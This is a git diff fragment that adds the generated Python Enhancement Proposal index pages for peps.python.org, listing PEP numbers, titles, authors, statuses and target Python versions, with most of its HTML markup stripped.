SF621Storing project metadata in pyproject.tomlBrett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, Sébastien Eustace, Thomas Kluyver, Tzu-ping Chung
SS622Structural Pattern MatchingBrandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin3.10
SF623Remove wstr from UnicodeInada Naoki3.10
SF624Remove Py_UNICODE encoder APIsInada Naoki3.11
SA625Filename of a Source DistributionTzu-ping Chung, Paul Moore
SF626Precise line numbers for debugging and other tools.Mark Shannon3.10
SF627Recording installed projectsPetr Viktorin
SF628Add math.tauAlyssa Coghlan3.6
SF629Versioning PyPI’s Simple APIDonald Stufft
IF630Isolating Extension ModulesPetr Viktorin
SS631Dependency specification in pyproject.toml based on PEP 508Ofek Lev
SF632Deprecate distutils moduleSteve Dower3.10
SR633Dependency specification in pyproject.toml using an exploded TOML tableLaurie Opperman, Arun Babu Neelicattu
SF634Structural Pattern Matching: SpecificationBrandt Bucher, Guido van Rossum3.10
IF635Structural Pattern Matching: Motivation and RationaleTobias Kohn, Guido van Rossum3.10
IF636Structural Pattern Matching: TutorialDaniel F Moisset3.10
SR637Support for indexing with keyword argumentsStefano Borini3.10
S638Syntactic MacrosMark Shannon
SP639Improving License Clarity with Better Package MetadataPhilippe Ombredanne, C.A.M. Gerlach, Karolina Surma
SR640Unused variable syntaxThomas Wouters3.10
SR641Using an underscore in the version portion of Python 3.10 compatibility tagsBrett Cannon, Steve Dower, Barry Warsaw3.10
SR642Explicit Pattern Syntax for Structural Pattern MatchingAlyssa Coghlan3.10
SF643Metadata for Package Source DistributionsPaul Moore
SF644Require OpenSSL 1.1.1 or newerChristian Heimes3.10
SW645Allow writing optional types as x?Maggie Moss
SF646Variadic GenericsMark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles3.11
SF647User-Defined Type GuardsEric Traut3.10
SR648Extensible customizations of the interpreter at startupMario Corchero3.11
SA649Deferred Evaluation Of Annotations Using DescriptorsLarry Hastings3.14
SW650Specifying Installer Requirements for Python ProjectsVikram Jayanthi, Dustin Ingram, Brett Cannon
SR651Robust Stack Overflow HandlingMark Shannon
SF652Maintaining the Stable ABIPetr Viktorin3.10
S653Precise Semantics for Pattern MatchingMark Shannon
SF654Exception Groups and except*Irit Katriel, Yury Selivanov, Guido van Rossum3.11
SF655Marking individual TypedDict items as required or potentially-missingDavid Foster3.11
SF656Platform Tag for Linux Distributions Using MuslTzu-ping Chung
SF657Include Fine Grained Error Locations in TracebacksPablo Galindo, Batuhan Taskaya, Ammar Askar3.11
SA658Serve Distribution Metadata in the Simple Repository APITzu-ping Chung
IF659Specializing Adaptive InterpreterMark Shannon
SF660Editable installs for pyproject.toml based builds (wheel based)Daniel Holth, Stéphane Bidoul
S661Sentinel ValuesTal Einat
SR662Editable installs via virtual wheelsBernát Gábor
IR663Standardizing Enum str(), repr(), and format() behaviorsEthan Furman3.11
IA664Python 3.11 Release SchedulePablo Galindo Salgado3.11
SR665A file format to list Python dependencies for reproducibility of an applicationBrett Cannon, Pradyun Gedam, Tzu-ping Chung
SR666Reject Foolish IndentationLaura Creighton2.2
SF667Consistent views of namespacesMark Shannon, Tian Gao3.13
SA668Marking Python base environments as “externally managed”Geoffrey Thomas, Matthias Klose, Filipe Laíns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam
SF669Low Impact Monitoring for CPythonMark Shannon3.12
SF670Convert macros to functions in the Python C APIErlend Egeberg Aasland, Victor Stinner3.11
S671Syntax for late-bound function argument defaultsChris Angelico3.12
IA672Unicode-related Security Considerations for PythonPetr Viktorin
SF673Self TypePradeep Kumar Srinivasan, James Hilton-Balfe3.11
SD674Disallow using macros as l-valuesVictor Stinner3.12
SF675Arbitrary Literal String TypePradeep Kumar Srinivasan, Graham Bleaney3.11
PA676PEP Infrastructure ProcessAdam Turner
SR677Callable Type SyntaxSteven Troxler, Pradeep Kumar Srinivasan3.11
SF678Enriching Exceptions with NotesZac Hatfield-Dodds3.11
S679Allow parentheses in assert statementsPablo Galindo Salgado3.12
SF680tomllib: Support for Parsing TOML in the Standard LibraryTaneli Hukkinen, Shantanu Jain3.11
SF681Data Class TransformsErik De Bonte, Eric Traut3.11
SF682Format Specifier for Signed ZeroJohn Belmonte3.11
SF683Immortal Objects, Using a Fixed RefcountEric Snow, Eddie Elizondo3.12
SF684A Per-Interpreter GILEric Snow3.12
SA685Comparison of extra names for optional distribution dependenciesBrett Cannon
SA686Make UTF-8 mode defaultInada Naoki3.15
SA687Isolating modules in the standard libraryErlend Egeberg Aasland, Petr Viktorin3.12
SF688Making the buffer protocol accessible in PythonJelle Zijlstra3.12
SF689Unstable C API tierPetr Viktorin3.12
SR690Lazy ImportsGermán Méndez Bravo, Carl Meyer3.12
SA691JSON-based Simple API for Python Package IndexesDonald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram
SF692Using TypedDict for more precise **kwargs typingFranek Magiera3.12
IA693Python 3.12 Release ScheduleThomas Wouters3.12
S694Upload 2.0 API for Python Package RepositoriesDonald Stufft
SF695Type Parameter SyntaxEric Traut3.12
SF696Type Defaults for Type ParametersJames Hilton-Balfe3.13
SF697Limited C API for Extending Opaque TypesPetr Viktorin3.12
SF698Override Decorator for Static TypingSteven Troxler, Joshua Xu, Shannon Zhu3.12
SA699Remove private dict version field added in PEP 509Ken Jin3.12
SF700Additional Fields for the Simple API for Package IndexesPaul Moore
SA701Syntactic formalization of f-stringsPablo Galindo, Batuhan Taskaya, Lysandros Nikolaou, Marta Gómez Macías3.12
SF702Marking deprecations using the type systemJelle Zijlstra3.13
SA703Making the Global Interpreter Lock Optional in CPythonSam Gross3.13
SW704Require virtual environments by default for package installersPradyun Gedam
SF705TypedDict: Read-only itemsAlice Purcell3.13
SF706Filter for tarfile.extractallPetr Viktorin3.12
SR707A simplified signature for __exit__ and __aexit__Irit Katriel3.12
SP708Extending the Repository API to Mitigate Dependency Confusion AttacksDonald Stufft
SF709Inlined comprehensionsCarl Meyer3.12
S710Recording the provenance of installed packagesFridolín Pokorný
S711PyBI: a standard format for distributing Python BinariesNathaniel J. Smith
SR712Adding a “converter” parameter to dataclasses.fieldJoshua Cannon3.13
SR713Callable ModulesAmethyst Reese3.12
SA714Rename dist-info-metadata in the Simple APIDonald Stufft
SF715Disabling bdist_egg distribution uploads on PyPIWilliam Woodruff
S718Subscriptable functionsJames Hilton-Balfe3.13
IA719Python 3.13 Release ScheduleThomas Wouters3.13
I720Cross-compiling Python packagesFilipe Laíns3.12
SF721Using tarfile.data_filter for source distribution extractionPetr Viktorin3.12
SR722Dependency specification for single-file scriptsPaul Moore
SF723Inline script metadataOfek Lev
SW724Stricter Type GuardsRich Chiodo, Eric Traut, Erik De Bonte3.13
S725Specifying external dependencies in pyproject.tomlPradyun Gedam, Ralf Gommers
SR726Module __setattr__ and __delattr__Sergey B Kirpichev3.13
S727Documentation in Annotated MetadataSebastián Ramírez3.13
S728TypedDict with Typed Extra ItemsZixuan James Li3.14
PA729Typing governance processJelle Zijlstra, Shantanu Jain
SF730Adding iOS as a supported platformRussell Keith-Magee3.13
PA731C API Working Group CharterGuido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel
PA732The Python Documentation Editorial BoardJoanna Jablonski
IF733An Evaluation of Python’s Public C APIErlend Egeberg Aasland, Domenico Andreoli, Stefan Behnel, Carl Friedrich Bolz-Tereick, Simon Cross, Steve Dower, Tim Felgentreff, David Hewitt, Shantanu Jain, Wenzel Jakob, Irit Katriel, Marc-Andre Lemburg, Donghee Na, Karl Nelson, Ronald Oussoren, Antoine Pitrou, Neil Schemenauer, Mark Shannon, Stepan Sindelar, Gregory P. Smith, Eric Snow, Victor Stinner, Guido van Rossum, Petr Viktorin, Carol Willing, William Woodruff, David Woods, Jelle Zijlstra
SD734Multiple Interpreters in the StdlibEric Snow3.13
SA735Dependency Groups in pyproject.tomlStephen Rosen
S736Shorthand syntax for keyword arguments at invocationJoshua Bambrick, Chris Angelico3.14
SF737C API to format a type fully qualified nameVictor Stinner3.13
SF738Adding Android as a supported platformMalcolm Smith3.13
S739Static description file for build details of Python installationsFilipe Laíns3.14
SF740Index support for digital attestationsWilliam Woodruff, Facundo Tuesca, Dustin Ingram
SF741Python Configuration C APIVictor Stinner3.14
SF742Narrowing types with TypeIsJelle Zijlstra3.13
S743Add Py_COMPAT_API_VERSION to the Python C APIVictor Stinner, Petr Viktorin3.14
I744JIT CompilationBrandt Bucher, Savannah Ostrowski3.13
IA745Python 3.14 Release ScheduleHugo van Kemenade3.14
S746Type checking Annotated metadataAdrian Garcia Badaracco3.14
S747Annotating Type FormsDavid Foster, Eric Traut3.14
S748A Unified TLS API for PythonJoop van de Pol, William Woodruff3.14
S749Implementing PEP 649Jelle Zijlstra3.14
S750Template StringsJim Baker, Guido van Rossum, Paul Everitt, Koudai Aono, Lysandros Nikolaou, Dave Peck3.14
S751A file format to record Python dependencies for installation reproducibilityBrett Cannon
S752Implicit namespaces for package repositoriesOfek Lev
SA753Uniform project URLs in core metadataWilliam Woodruff, Facundo Tuesca
SR754IEEE 754 Floating Point Special ValuesGregory R. Warnes2.3
P755Implicit namespace policy for PyPIOfek Lev
SW756Add PyUnicode_Export() and PyUnicode_Import() C functionsVictor Stinner3.14
SF757C API to import-export Python integersSergey B Kirpichev, Victor Stinner3.14
S758Allow except and except* expressions without parenthesesPablo Galindo, Brett Cannon3.14
S759External Wheel HostingBarry Warsaw, Ethan Smith
SW760No More Bare ExceptsPablo Galindo, Brett Cannon3.14
PA761Deprecating PGP signatures for CPython artifactsSeth Michael Larson3.14
IF762REPL-acing the default REPLPablo Galindo Salgado, Łukasz Langa, Lysandros Nikolaou, Emily Morehouse-Valcarcel3.13
S763Limiting deletions on PyPIWilliam Woodruff, Alexis Challande
S765Disallow return/break/continue that exit a finally blockIrit Katriel, Alyssa Coghlan3.14
I766Explicit Priority Choices Among Multiple IndexesMichael Sarahan
S767Annotating Read-Only AttributesEneg3.14
S768Safe external debugger interface for CPythonPablo Galindo Salgado, Matt Wozniski, Ivona Stojanovic3.14
S777How to Re-invent the WheelEthan Smith
S789Preventing task-cancellation bugs by limiting yield in async generatorsZac Hatfield-Dodds, Nathaniel J. Smith3.14
IA801ReservedBarry Warsaw
P2026Calendar versioning for PythonHugo van Kemenade3.26
PF3000Python 3000Guido van Rossum
PW3001Procedure for reviewing and improving standard library modulesGeorg Brandl
PF3002Procedure for Backwards-Incompatible ChangesSteven Bethard
PF3003Python Language MoratoriumBrett Cannon, Jesse Noller, Guido van Rossum
PF3099Things that will Not Change in Python 3000Georg Brandl
PF3100Miscellaneous Python 3.0 PlansBrett Cannon
SF3101Advanced String FormattingTalin3.0
SF3102Keyword-Only ArgumentsTalin3.0
SR3103A Switch/Case StatementGuido van Rossum3.0
SF3104Access to Names in Outer ScopesKa-Ping Yee3.0
SF3105Make print a functionGeorg Brandl3.0
SF3106Revamping dict.keys(), .values() and .items()Guido van Rossum3.0
SF3107Function AnnotationsCollin Winter, Tony Lownds3.0
SF3108Standard Library ReorganizationBrett Cannon3.0
SF3109Raising Exceptions in Python 3000Collin Winter3.0
SF3110Catching Exceptions in Python 3000Collin Winter3.0
SF3111Simple input built-in in Python 3000Andre Roberge3.0
SF3112Bytes literals in Python 3000Jason Orendorff3.0
SF3113Removal of Tuple Parameter UnpackingBrett Cannon3.0
SF3114Renaming iterator.next() to iterator.__next__()Ka-Ping Yee3.0
SF3115Metaclasses in Python 3000Talin3.0
SF3116New I/ODaniel Stutzbach, Guido van Rossum, Mike Verdone3.0
SR3117Postfix type declarationsGeorg Brandl3.0
SF3118Revising the buffer protocolTravis Oliphant, Carl Banks3.0
SF3119Introducing Abstract Base ClassesGuido van Rossum, Talin3.0
SF3120Using UTF-8 as the default source encodingMartin von Löwis3.0
SF3121Extension Module Initialization and FinalizationMartin von Löwis3.0
SR3122Delineation of the main moduleBrett Cannon
SF3123Making PyObject_HEAD conform to standard CMartin von Löwis3.0
SD3124Overloading, Generic Functions, Interfaces, and AdaptationPhillip J. Eby
SR3125Remove Backslash ContinuationJim J. Jewett
SR3126Remove Implicit String ConcatenationJim J. Jewett, Raymond Hettinger
SF3127Integer Literal Support and SyntaxPatrick Maupin3.0
SR3128BList: A Faster List-like TypeDaniel Stutzbach2.6, 3.0
SF3129Class DecoratorsCollin Winter3.0
SR3130Access to Current Module/Class/FunctionJim J. Jewett3.0
SF3131Supporting Non-ASCII IdentifiersMartin von Löwis3.0
SF3132Extended Iterable UnpackingGeorg Brandl3.0
SR3133Introducing RolesCollin Winter3.0
SF3134Exception Chaining and Embedded TracebacksKa-Ping Yee3.0
SF3135New SuperCalvin Spealman, Tim Delaney, Lie Ryan3.0
SR3136Labeled break and continueMatt Chisholm3.1
SF3137Immutable Bytes and Mutable BufferGuido van Rossum3.0
SF3138String representation in Python 3000Atsuo Ishimoto3.0
SR3139Cleaning out sys and the “interpreter” moduleBenjamin Peterson3.0
SR3140str(container) should call str(item), not repr(item)Oleg Broytman, Jim J. Jewett
SF3141A Type Hierarchy for NumbersJeffrey Yasskin3.0
SR3142Add a “while” clause to generator expressionsGerald Britton3.0
SD3143Standard daemon process libraryBen Finney3.x
SF3144IP Address Manipulation Library for the Python Standard LibraryPeter Moody3.3
SW3145Asynchronous I/O For subprocess.PopenEric Pruitt, Charles R. McCreary, Josiah Carlson3.2
SW3146Merging Unladen Swallow into CPythonCollin Winter, Jeffrey Yasskin, Reid Kleckner3.3
SF3147PYC Repository DirectoriesBarry Warsaw3.2
SF3148futures - execute computations asynchronouslyBrian Quinlan3.2
SF3149ABI version tagged .so filesBarry Warsaw3.2
SD3150Statement local namespaces (aka “given” clause)Alyssa Coghlan3.4
SF3151Reworking the OS and IO exception hierarchyAntoine Pitrou3.3
SR3152CofunctionsGregory Ewing3.3
SS3153Asynchronous IO supportLaurens Van Houtven
SF3154Pickle protocol version 4Antoine Pitrou3.4
SF3155Qualified name for classes and functionsAntoine Pitrou3.3
SF3156Asynchronous IO Support Rebooted: the “asyncio” ModuleGuido van Rossum3.3
IF3333Python Web Server Gateway Interface v1.0.1Phillip J. Eby
IF8000Python Language Governance Proposal OverviewBarry Warsaw
PF8001Python Governance Voting ProcessBrett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, Łukasz Langa, Mariatta, Nathaniel J. Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware
IF8002Open Source Governance SurveyBarry Warsaw, Łukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing
IR8010The Technical Leader Governance ModelBarry Warsaw
IR8011Python Governance Model Lead by Trio of PythonistasMariatta, Barry Warsaw
IR8012The Community Governance ModelŁukasz Langa
IR8013The External Council Governance ModelSteve Dower
IR8014The Commons Governance ModelJack Jansen
IR8015Organization of the Python communityVictor Stinner
IA8016The Steering Council ModelNathaniel J. Smith, Donald Stufft
IF8100January 2019 Steering Council electionNathaniel J. Smith, Ee Durbin
IF81012020 Term Steering Council electionEwa Jodlowska, Ee Durbin
IF81022021 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81032022 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81042023 Term Steering Council electionEe Durbin
IF81052024 Term Steering Council electionEe Durbin
IF81062025 Term Steering Council electionEe Durbin
+
+ +
+
+ + + + + \ No newline at end of file diff --git a/objects.inv b/objects.inv new file mode 100644 index 00000000000..b447d00028e Binary files /dev/null and b/objects.inv differ diff --git a/pep-0000/index.html b/pep-0000/index.html new file mode 100644 index 00000000000..12986b08679 --- /dev/null +++ b/pep-0000/index.html @@ -0,0 +1,5375 @@ + + + + + + + + PEP 0 – Index of Python Enhancement Proposals (PEPs) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 0 – Index of Python Enhancement Proposals (PEPs)

+
+
Author:
+
The PEP Editors
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
13-Jul-2000
+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP contains the index of all Python Enhancement Proposals, +known as PEPs. PEP numbers are assigned +by the PEP editors, and once assigned are never changed. The +version control history of +the PEP texts represent their historical record.

+
+
+

Topics

+

PEPs for specialist subjects are indexed by topic.

+ +
+
+

API

+

The PEPS API is a JSON file of metadata about all the published PEPs. Read more here.

+
+
+

Numerical Index

+

The numerical index contains a table of all PEPs, ordered by number.

+
+
+

Index by Category

+
+

Process and Meta-PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
PA1PEP Purpose and GuidelinesBarry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan
PA2Procedure for Adding New ModulesBrett Cannon, Martijn Faassen
PA4Deprecation of Standard ModulesBrett Cannon, Martin von Löwis
PA7Style Guide for C CodeGuido van Rossum, Barry Warsaw
PA8Style Guide for Python CodeGuido van Rossum, Barry Warsaw, Alyssa Coghlan
PA10Voting GuidelinesBarry Warsaw
PA11CPython platform supportMartin von Löwis, Brett Cannon
PA12Sample reStructuredText PEP TemplateDavid Goodger, Barry Warsaw, Brett Cannon
PA13Python Language GovernanceThe Python core team and community
PA387Backwards Compatibility PolicyBenjamin Peterson
PA545Python Documentation TranslationsJulien Palard, Inada Naoki, Victor Stinner
PA602Annual Release Cycle for PythonŁukasz Langa3.9
PA609Python Packaging Authority (PyPA) GovernanceDustin Ingram, Pradyun Gedam, Sumana Harihareswara
PA676PEP Infrastructure ProcessAdam Turner
PA729Typing governance processJelle Zijlstra, Shantanu Jain
PA731C API Working Group CharterGuido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel
PA732The Python Documentation Editorial BoardJoanna Jablonski
PA761Deprecating PGP signatures for CPython artifactsSeth Michael Larson3.14
+
+
+

Other Informational PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
IA20The Zen of PythonTim Peters
IA101Doing Python Releases 101Barry Warsaw, Guido van Rossum
IF247API for Cryptographic Hash FunctionsA.M. Kuchling
IF248Python Database API Specification v1.0Greg Stein, Marc-André Lemburg
IF249Python Database API Specification v2.0Marc-André Lemburg
IA257Docstring ConventionsDavid Goodger, Guido van Rossum
IF272API for Block Encryption Algorithms v1.0A.M. Kuchling
IA287reStructuredText Docstring FormatDavid Goodger
IA290Code Migration and ModernizationRaymond Hettinger
IF333Python Web Server Gateway Interface v1.0Phillip J. Eby
IA394The “python” Command on Unix-Like SystemsKerrick Staley, Alyssa Coghlan, Barry Warsaw, Petr Viktorin, Miro Hrončok, Carol Willing
IF399Pure Python/C Accelerator Module Compatibility RequirementsBrett Cannon3.3
IF430Migrating to Python 3 as the default online documentationAlyssa Coghlan
IA434IDLE Enhancement Exception for All BranchesTodd Rovito, Terry Reedy
IF452API for Cryptographic Hash Functions v2.0A.M. Kuchling, Christian Heimes
IF457Notation For Positional-Only ParametersLarry Hastings
IF482Literature Overview for Type HintsŁukasz Langa
IF483The Theory of Type HintsGuido van Rossum, Ivan Levkivskyi
IA514Python registration in the Windows registrySteve Dower
IF579Refactoring C functions and methodsJeroen Demeyer
IF588GitHub Issues Migration PlanMariatta
IA596Python 3.9 Release ScheduleŁukasz Langa3.9
IF607Reducing CPython’s Feature Delivery LatencyŁukasz Langa, Steve Dower, Alyssa Coghlan3.9
IA619Python 3.10 Release SchedulePablo Galindo Salgado3.10
IF630Isolating Extension ModulesPetr Viktorin
IF635Structural Pattern Matching: Motivation and RationaleTobias Kohn, Guido van Rossum3.10
IF636Structural Pattern Matching: TutorialDaniel F Moisset3.10
IF659Specializing Adaptive InterpreterMark Shannon
IA664Python 3.11 Release SchedulePablo Galindo Salgado3.11
IA672Unicode-related Security Considerations for PythonPetr Viktorin
IA693Python 3.12 Release ScheduleThomas Wouters3.12
IA719Python 3.13 Release ScheduleThomas Wouters3.13
IF733An Evaluation of Python’s Public C APIErlend Egeberg Aasland, Domenico Andreoli, Stefan Behnel, Carl Friedrich Bolz-Tereick, Simon Cross, Steve Dower, Tim Felgentreff, David Hewitt, Shantanu Jain, Wenzel Jakob, Irit Katriel, Marc-Andre Lemburg, Donghee Na, Karl Nelson, Ronald Oussoren, Antoine Pitrou, Neil Schemenauer, Mark Shannon, Stepan Sindelar, Gregory P. Smith, Eric Snow, Victor Stinner, Guido van Rossum, Petr Viktorin, Carol Willing, William Woodruff, David Woods, Jelle Zijlstra
IA745Python 3.14 Release ScheduleHugo van Kemenade3.14
IF762REPL-acing the default REPLPablo Galindo Salgado, Łukasz Langa, Lysandros Nikolaou, Emily Morehouse-Valcarcel3.13
IA801ReservedBarry Warsaw
IF3333Python Web Server Gateway Interface v1.0.1Phillip J. Eby
IF8000Python Language Governance Proposal OverviewBarry Warsaw
IF8002Open Source Governance SurveyBarry Warsaw, Łukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing
IA8016The Steering Council ModelNathaniel J. Smith, Donald Stufft
IF8100January 2019 Steering Council electionNathaniel J. Smith, Ee Durbin
IF81012020 Term Steering Council electionEwa Jodlowska, Ee Durbin
IF81022021 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81032022 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81042023 Term Steering Council electionEe Durbin
IF81052024 Term Steering Council electionEe Durbin
IF81062025 Term Steering Council electionEe Durbin
+
+
+

Provisional PEPs (provisionally accepted; interface may still change)

+ + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SP639Improving License Clarity with Better Package MetadataPhilippe Ombredanne, C.A.M. Gerlach, Karolina Surma
SP708Extending the Repository API to Mitigate Dependency Confusion AttacksDonald Stufft
+
+
+

Accepted PEPs (accepted; may not be implemented yet)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SA458Secure PyPI downloads with signed repository metadataTrishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos
SA563Postponed Evaluation of AnnotationsŁukasz Langa3.7
SA590Vectorcall: a fast calling protocol for CPythonMark Shannon, Jeroen Demeyer3.8
SA625Filename of a Source DistributionTzu-ping Chung, Paul Moore
SA649Deferred Evaluation Of Annotations Using DescriptorsLarry Hastings3.14
SA658Serve Distribution Metadata in the Simple Repository APITzu-ping Chung
SA668Marking Python base environments as “externally managed”Geoffrey Thomas, Matthias Klose, Filipe Laíns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam
SA685Comparison of extra names for optional distribution dependenciesBrett Cannon
SA686Make UTF-8 mode defaultInada Naoki3.15
SA687Isolating modules in the standard libraryErlend Egeberg Aasland, Petr Viktorin3.12
SA691JSON-based Simple API for Python Package IndexesDonald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram
SA699Remove private dict version field added in PEP 509Ken Jin3.12
SA701Syntactic formalization of f-stringsPablo Galindo, Batuhan Taskaya, Lysandros Nikolaou, Marta Gómez Macías3.12
SA703Making the Global Interpreter Lock Optional in CPythonSam Gross3.13
SA714Rename dist-info-metadata in the Simple APIDonald Stufft
SA735Dependency Groups in pyproject.tomlStephen Rosen
SA753Uniform project URLs in core metadataWilliam Woodruff, Facundo Tuesca
+
+
+

Open PEPs (under consideration)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
S467Minor API improvements for binary sequencesAlyssa Coghlan, Ethan Furman3.13
S480Surviving a Compromise of PyPI: End-to-end signing of packagesTrishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore
S603Adding a frozenmap type to collectionsYury Selivanov
S638Syntactic MacrosMark Shannon
S653Precise Semantics for Pattern MatchingMark Shannon
S661Sentinel ValuesTal Einat
S671Syntax for late-bound function argument defaultsChris Angelico3.12
S679Allow parentheses in assert statementsPablo Galindo Salgado3.12
S694Upload 2.0 API for Python Package RepositoriesDonald Stufft
S710Recording the provenance of installed packagesFridolín Pokorný
S711PyBI: a standard format for distributing Python BinariesNathaniel J. Smith
S718Subscriptable functionsJames Hilton-Balfe3.13
I720Cross-compiling Python packagesFilipe Laíns3.12
S725Specifying external dependencies in pyproject.tomlPradyun Gedam, Ralf Gommers
S727Documentation in Annotated MetadataSebastián Ramírez3.13
S728TypedDict with Typed Extra ItemsZixuan James Li3.14
S736Shorthand syntax for keyword arguments at invocationJoshua Bambrick, Chris Angelico3.14
S739Static description file for build details of Python installationsFilipe Laíns3.14
S743Add Py_COMPAT_API_VERSION to the Python C APIVictor Stinner, Petr Viktorin3.14
I744JIT CompilationBrandt Bucher, Savannah Ostrowski3.13
S746Type checking Annotated metadataAdrian Garcia Badaracco3.14
S747Annotating Type FormsDavid Foster, Eric Traut3.14
S748A Unified TLS API for PythonJoop van de Pol, William Woodruff3.14
S749Implementing PEP 649Jelle Zijlstra3.14
S750Template StringsJim Baker, Guido van Rossum, Paul Everitt, Koudai Aono, Lysandros Nikolaou, Dave Peck3.14
S751A file format to record Python dependencies for installation reproducibilityBrett Cannon
S752Implicit namespaces for package repositoriesOfek Lev
P755Implicit namespace policy for PyPIOfek Lev
S758Allow except and except* expressions without parenthesesPablo Galindo, Brett Cannon3.14
S759External Wheel HostingBarry Warsaw, Ethan Smith
S763Limiting deletions on PyPIWilliam Woodruff, Alexis Challande
S765Disallow return/break/continue that exit a finally blockIrit Katriel, Alyssa Coghlan3.14
I766Explicit Priority Choices Among Multiple IndexesMichael Sarahan
S767Annotating Read-Only AttributesEneg3.14
S768Safe external debugger interface for CPythonPablo Galindo Salgado, Matt Wozniski, Ivona Stojanovic3.14
S777How to Re-invent the WheelEthan Smith
S789Preventing task-cancellation bugs by limiting yield in async generatorsZac Hatfield-Dodds, Nathaniel J. Smith3.14
P2026Calendar versioning for PythonHugo van Kemenade3.26
+
+
+

Finished PEPs (done, with a stable interface)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 